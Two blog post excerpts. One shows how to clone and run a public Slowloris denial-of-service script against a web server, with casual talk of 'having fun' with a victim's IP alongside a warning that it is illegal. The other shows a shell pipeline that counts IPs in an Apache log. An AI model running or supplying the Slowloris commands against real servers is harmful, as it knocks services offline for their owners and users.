Slow Loris attack at Apache web server part 2

In my previous post I wrote about Slow Loris atack. But this was theory, what does it look like in practice? From GitHub I downloaded pythoon code and just ran it. Just in case I made a copy.
 

git clone https://github.com/gkbrk/slowloris.git
cd slowloris
python3 slowloris.py example.com

For my blog I’m using CloudFlare DNS, so my IP is hidden behind their DNS servers. But if you know victims IP address or domain is resolving IP address, then you can have fun. But be aware, making this attacks is illegal!
 

Read moreSlow Loris attack at Apache web server part 2

Sort uniq IP address from Apache log

I’m trying to extract IP addresses from my apache log, count and sort them.

Using the numeric in the first sort will give you the desired result:

cat access.log | awk ‘{print $1}’ | sort -n | uniq -c | sort -nr | head -20

15 212.XXX.XXX.XXX
2 198.XXX.XXX.XXX
1 216.XXX.XXX.XXX
1 139.XXX.XXX.XXX
10 51.XXX.XXX.XXX
2 37.XXX.XXX.XXX
1 76.XXX.XXX.XXX
1 74.XXX.XXX.XXX
1 51.XXX.XXX.XXX

Read moreSort uniq IP address from Apache log